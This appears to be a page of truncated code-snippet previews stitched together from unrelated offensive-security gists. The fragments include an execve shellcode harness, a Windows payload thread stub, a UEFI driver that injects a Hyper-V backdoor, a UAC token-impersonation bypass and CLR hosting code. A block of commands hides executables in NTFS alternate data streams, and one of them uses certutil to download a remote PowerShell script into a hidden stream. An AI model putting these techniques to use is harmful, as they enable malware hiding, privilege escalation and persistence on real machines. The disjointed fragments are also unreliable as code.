| /* | |
| * Example of simple execve('/bin/sh', ...); shellcode compiled | |
| * and embedded within C program, then compiled on 64-bit with NX bit | |
| * turned off and set executable stack. | |
| * | |
| * Compilation: | |
| * $ gcc -fno-stack-protector -z execstack execve1.c -o execve1c | |
| */ | |
| /* |
| void Payload() { | |
| DWORD threadId; | |
| CreateThread( | |
| NULL, // default security attributes | |
| 0, // use default stack size | |
| MyThreadFunction, // thread function name | |
| NULL, // argument to thread function | |
| 0, // use default creation flags | |
| &threadId); | |
| } |
| Windows Registry Editor Version 5.00 | |
| [HKEY_CLASSES_ROOT\Directory\Background\shell\OpenWithCMD] | |
| @="Open with CMD" | |
| "Icon"="C:\\WINDOWS\\system32\\cmd.exe" | |
| [HKEY_CLASSES_ROOT\Directory\Background\shell\OpenWithCMD\command] | |
| @="cmd.exe /k cd %V" | |
| [HKEY_CLASSES_ROOT\Directory\shell\OpenWithCMD] |
| #include "global.h" | |
| HINSTANCE g_hInstance; | |
| HANDLE g_ConOut = NULL; | |
| BOOL g_ConsoleOutput = FALSE; | |
| WCHAR g_BE = 0xFEFF; | |
| RTL_OSVERSIONINFOW g_osv; | |
| #define CI_DLL "ci.dll" |
| function New-SYSVOLZip { | |
| <# | |
| .SYNOPSIS | |
| Compresses all folders/files in SYSVOL to a .zip file. | |
| Author: Will Schroeder (@harmj0y) | |
| License: BSD 3-Clause | |
| Required Dependencies: None |
| /* | |
| ********************************************************************* | |
| Part of UEFI DXE driver code that injects Hyper-V VM exit handler | |
| backdoor into the Device Guard enabled Windows 10 Enterprise. | |
| Execution starts from new_ExitBootServices() -- a hook handler | |
| for EFI_BOOT_SERVICES.ExitBootServices() which being called by | |
| winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi | |
| transfers exeution to previously loaded Hyper-V kernel (hvix64.sys) |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
| package | |
| { | |
| import flash.display.Loader; | |
| import flash.display.Sprite; | |
| import flash.events.Event; | |
| import flash.events.IOErrorEvent; | |
| import flash.events.SecurityErrorEvent; | |
| import flash.net.URLLoader; | |
| import flash.net.URLRequest; | |
| import flash.system.Capabilities; |
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
| function UAC-TokenMagic { | |
| <# | |
| .SYNOPSIS | |
| Based on James Forshaw's three part post on UAC, linked below, and possibly a technique | |
| used by the CIA! | |
| Essentially we duplicate the token of an elevated process, lower it's mandatory | |
| integrity level, use it to create a new restricted token, impersonate it and | |
| use the Secondary Logon service to spawn a new process with High IL. Like | |
| playing hide-and-go-seek with tokens! ;)) |
